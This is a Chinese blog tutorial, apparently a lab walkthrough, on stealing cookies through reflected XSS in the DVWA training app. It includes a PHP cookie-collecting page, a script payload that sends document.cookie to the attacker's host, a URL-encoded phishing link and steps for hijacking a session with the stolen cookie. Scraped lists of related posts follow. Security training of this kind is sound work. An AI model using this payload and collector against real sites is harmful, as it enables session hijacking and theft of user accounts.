反射型xss钓鱼盗取用户cookie
流程:
第一步:搭建用于接收cookie的web站点。
第二步:构建恶意链接发送给用户。
第三步:用户点击恶意链接,目标网站返回带有恶意代码的web页面。
第四步:浏览器解析web页面,执行恶意代码,跳转到搭建的web站点。
第五步:从搭建的web站点中获取用户cookie。
准备
靶场:dvwa
工具:burpsuite,kali虚拟机
第一步
***搭建我们的web站点,用来接收用户cookie。***
这里我用kali来模拟,打开我的kali虚拟机,开启apache服务,进入/var/www/html文件,写一个用来接收cookie的网页,代码如下:
<?php$a=$_GET["cookie"];$file=fopen("gtck.html","a") or exit("</br>未找到文件!");fwrite($file,$a."</br>");fclose($file);
?>
很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie。
之后还有很重要的一件事,我们要给这两个文件改一下权限,不然会导致写入不成功,用户传来的cookie我们无法保存,
首先为我们要查看一下运行apache的用户名,然后更改两个文件的权限。
ps -axu | grep apache #查看运行apache的用户名
chown www-data:www-data xssgc.php gtck.html # 更改文件权限
浏览器访问http://192.168.0.109/xssgc.php?cookie=1,看看传入的值有没有保存在gtck.html里。
可以看到写入成功了,第一步完成。
第二步:
***构建恶意链接发送给用户。***
我们登录dvwa,将难度调到low,然后选择反射型xss:
我们知道这里存在反射型xss漏洞,所以我们直接构建恶意代码:
<script>document.location='http://192.168.0.109/xssgc.php?cookie='+document.cookie</script>
这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到
我们网页的作用,document.cookie起到获取用户cookie的作用,那么拼接上dvwa的url就是:
http://192.168.0.107/DVWA-master/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.0.109/xssgc.php?cookie='+document.cookie</script>
但是url里直接有代码就很明显,而且有时还会出错,所以我们要对payload进行url编码。
打开burp,选择decoder选项,输入我们的payload,选择url编码。
(当然也可以在一些在线编码网站上进行编码)
将编码后的paylod复制下来,然后拼接上url:
http://192.168.0.107/DVWA-master/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%31%30%39%2f%78%73%73%67%63%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65a%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
这就是最后完整的url,我们还可以对其伪造一下,列如短链接啥的,不过只是为了演示这儿就不弄了。
第三步:
***将恶意链接发送给用户,用户点击。***
我们在物理机上用另一个账号登录dvwa,登录昵称为1337。
然后点击我们的恶意链接,模拟用户点击。
我们发现页面跳转到了我们准备的web网页,去kali看一下有没有保存到cookie:
保存成功!!
第四步:通过cookie更改账户
我们回到admin这个账户上,通过f12更改cookie,将cookie改为我们刚获取到的用户的cookie。
然后刷新一下。
可以看到我们的用户变为了1337。
反射型xss钓鱼盗取用户cookie相关推荐
- xss漏洞-DVWA跨站攻击盗取用户cookie值
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style ...
- 2021-09-01 网安实验-XSS-存储型XSS获取用户cookie
一:存储型XSS 1.保存用户cookie 我们可以通过JS,构造一个请求,来请求一个我们有权限的页面,在构造请求的时候,把用户的cookie当作参数传过去,然后我们就可以在这个页面里,接收传过来的参 ...
- 反射型xss(跨站脚本攻击)
反射型xss(跨站脚本攻击) 通常人们会把跨站脚本攻击(Cross Site Scripting)缩写为CSS),但是这与浏览器的层叠样式表css会混淆,所以人们把跨站脚本攻击缩写为xss. xss原 ...
- 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...
- php反射型xss,利用反射型XSS漏洞,模拟获取登录账户的Cookie
目录结构 一.测试环境 二.测试目标 三.原理描述 四.操作步骤 1.在服务器上搭建并启用hacker测试网站 2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹 3.在xss文件夹下创建攻击 ...
- 三个臭皮匠浅谈xss获取用户cookie的安全漏洞
利用别人的cookie,他们可以冒充真实的用户,在颁发cookie的那个网站中为所欲为,个人隐私在他们面前根本不存在. 接下来这篇文章以3个兄弟之间的对话进行讲解. 运气好的话连别人的用户名和密码都能 ...
- 最新钓鱼网站假扮Office 365 信箱 恐会盗取用户密码
网站 Bleeping Computer 先前报导,近日网络出现新钓鱼邮件,不法分子发送假扮 Office 365 无法送出邮件的提示信,尝试盗取用户的密码.最先由 ISC Handler 的 Xav ...
- 【Web安全】XSS简介与XSS测试平台截取用户COOKIE的探索
文章目录 1 XSS简介 2 XSS分类 3 XSS原理演示 4 XSS测试平台使用 4.1 指引文档 4.2 勾选默认模块测试成功的返回值 1 XSS简介 百度百科的解释: XSS又叫CSS (Cr ...
- 反射型XSS漏洞详解
反射型XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞.通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户.对于开发者而言,使用这种机制 ...
最新文章
- java连接mongodb_java连接mongodb源码解读
- linux差分备份,完全和差分备份的自动化模型
- 创建可微物理引擎Nimble,开源SOTA人体骨骼模型,斯坦福腿疾博士生用AI「助跑」人生...
- ActionScript 3.0 Step By Step系列(五):走在面向对象开发的路上,以类为基础去思考编程问题...
- 欣喜若狂--成功的第一步
- [转]C#与数据结构--树论--平衡二叉树(AVL Tree)
- 非文学翻译理论与实践_北外“欧洲非通用语文学翻译与研究中心”正式成立
- 【python学习】——读取csv文件
- 随笔-机器如何学习我们的知识?
- ubuntu动态截图(GIF动画)
- php while 语录,PHP While 循环
- OpenShift - 扩展收缩应用部署规模
- 500万相机芯片尺寸_MGS二代系列500万像素新品面世
- LibreOJ #6014. 「网络流 24 题」最长 k 可重区间集
- 3cd修改tftp服务器地址,模式tftp服务器是什么
- svn多分支开发合并技巧(idea or tortoiseSVN)
- 网络词汇泛滥:神马都是浮云?
- PMP 项目质量管理
- AOJ-proble-807
- loadrunne-- Analysis 分析器
热门文章
- mysql中clog_Colg论坛
- python学习基础篇Day08(P85~~95)
- android 横向更多,改变传统打造视觉盛宴 Android四大桌面横向对比
- “守、攻、抢”配送机器人市场的“神仙打架”
- python 解压的几种方法
- 接入谷歌的语音识别(speech-to-text)
- ckeditor直接粘贴图片实现
- 苹果成功秘诀:十大关键因素导致与众不同(转)
- 视频播放器MX Player Pro 目前最新长期更新
- excel首行固定_EXCEL 一个工作表如何快速拆分多个工作表的方法